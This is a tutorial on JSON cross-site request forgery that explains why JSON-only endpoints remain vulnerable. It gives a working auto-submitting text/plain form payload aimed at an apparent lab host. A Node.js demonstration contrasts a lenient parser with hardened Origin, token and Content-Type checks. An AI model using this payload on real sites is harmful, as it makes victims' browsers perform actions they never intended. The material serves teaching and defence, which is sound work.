JSON Cross-Site Request Forgery (JSON CSRF)
JSON Cross-Site Request Forgery occurs when a web application accepts JSON-formatted request bodies but does not enforce CSRF protections (tokens, Origin checks, SameSite cookies), allowing an attacker to force an authenticated user's browser to perform unintended actions.
Many developers incorrectly assume that accepting only JSON automatically prevents CSRF because an HTML form cannot set Content-Type: application/json. This is false: a form can still deliver a body that parses as valid JSON.
Why JSON does NOT prevent CSRF
- Browsers can send arbitrary POST bodies using HTML forms; with enctype="text/plain" the field name and value are sent unencoded, so quotes and braces reach the server intact
- Servers may:
  - Ignore the Content-Type header and parse the body as JSON regardless of whether it is application/json or text/plain
  - Leniently parse malformed JSON (trailing data, unexpected keys)
- Cookies are automatically included in cross-site requests, so the forged request is authenticated as the victim
- Older browsers or missing SameSite enforcement worsen the issue
Exploitation technique
HTML forms can be abused to inject JSON by splitting the document across the input's name and value attributes: the browser's text/plain encoding reassembles the two halves (joined by an "=") into a body that a lenient parser accepts as valid JSON.
Malicious CSRF payload (json data trick)
<html>
<body onload="document.getElementById('csrf').submit()">
  <!-- enctype="text/plain" makes the browser send each field as name=value with no encoding -->
  <form id="csrf"
        action="http://ptl-2166d1e9eab7-77041099edee.libcurl.me/share"
        method="POST"
        enctype="text/plain">
    <!-- the dummy "fake" key absorbs the "=" the browser inserts between name and value -->
    <input name='{"user":"test","id":0,"fake":"' value='"}'>
  </form>
</body>
</html>
How this works
- The browser encodes the single field as name=value followed by CRLF, so the request body is:
{"user":"test","id":0,"fake":"="}
  (the "=" lands inside the dummy "fake" string, which is why that key exists; the request is sent with Content-Type: text/plain, not application/json)
- Server:
  - Ignores the Content-Type and parses the body as JSON successfully (the trailing CRLF is just whitespace to the parser)
  - Authenticates the request with the victim's automatically attached cookies
  - Executes the action
The victim unknowingly performs the request.
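The following Node.js script is an added example, not code from the original page or from the lab it targets. It reproduces the text/plain form encoding the browser applies to the payload above, shows how a lenient endpoint ends up with a parsed JSON object, and contrasts the pre-parse checks a hardened endpoint should run. The app and attacker origins, the session cookie, the token header name and the sample requests are all constructed for illustration.

```javascript
// Added example (not the original page's code). Origins, cookie values, the
// X-CSRF-Token header and the request objects below are hypothetical.

// text/plain form encoding as browsers implement it: each field becomes
// name "=" value CRLF with no percent-encoding, so quotes and braces survive.
function encodeTextPlainForm(fields) {
  return fields.map(([name, value]) => `${name}=${value}\r\n`).join("");
}

// The single <input> from the page's payload, as a [name, value] pair.
const PAYLOAD_FIELDS = [['{"user":"test","id":0,"fake":"', '"}']];

// A lenient server: never looks at Content-Type and feeds the raw body to
// JSON.parse. The trailing CRLF is whitespace, so the smuggled JSON parses.
function lenientServerHandle(req) {
  return JSON.parse(req.body);
}

// Hardened pre-parse checks; returns the first failing reason or null.
// A cross-origin HTML form cannot set application/json (only fetch/XHR can,
// and that triggers a CORS preflight), cannot forge the Origin header, and
// cannot read a per-session token, so any of these stops the form trick.
function rejectReason(req, appOrigin) {
  const mediaType = (req.headers["content-type"] || "")
    .split(";")[0].trim().toLowerCase();
  if (mediaType !== "application/json") return "content-type is not application/json";
  if (req.headers["origin"] !== appOrigin) return "origin mismatch";
  const token = req.headers["x-csrf-token"];
  if (!token || token !== req.session.csrfToken) return "missing or invalid CSRF token";
  return null;
}

// Constructed request as the victim's browser emits it when the attacker's page
// auto-submits the form: attacker Origin, text/plain body, victim cookie attached.
function forgedRequest() {
  return {
    method: "POST",
    headers: {
      "content-type": "text/plain",
      "origin": "https://attacker.example",
      "cookie": "session=victim-session-id",
    },
    body: encodeTextPlainForm(PAYLOAD_FIELDS),
    session: { csrfToken: "tok-4f2a" }, // server-side state looked up from the cookie
  };
}

// Constructed request from the app's own front-end JavaScript: fetch() with a
// real JSON body, same-origin Origin header and the session's CSRF token.
function legitimateRequest() {
  return {
    method: "POST",
    headers: {
      "content-type": "application/json; charset=utf-8",
      "origin": "https://app.example",
      "cookie": "session=victim-session-id",
      "x-csrf-token": "tok-4f2a",
    },
    body: JSON.stringify({ user: "test", id: 0 }),
    session: { csrfToken: "tok-4f2a" },
  };
}

// Walk-through when run directly.
const forged = forgedRequest();
console.log("forged body:", JSON.stringify(forged.body));
console.log("lenient server parsed:", lenientServerHandle(forged));
console.log("hardened server, forged request:", rejectReason(forged, "https://app.example"));
console.log("hardened server, legitimate request:", rejectReason(legitimateRequest(), "https://app.example"));
```

The Content-Type check is defence in depth, not the whole fix: it only helps because a form is limited to three enctypes, none of which is application/json. The Origin check and the per-session token are what actually bind the request to the application's own pages; marking the session cookie SameSite=Lax or Strict removes the automatically attached credential that makes the forged request worth sending at all.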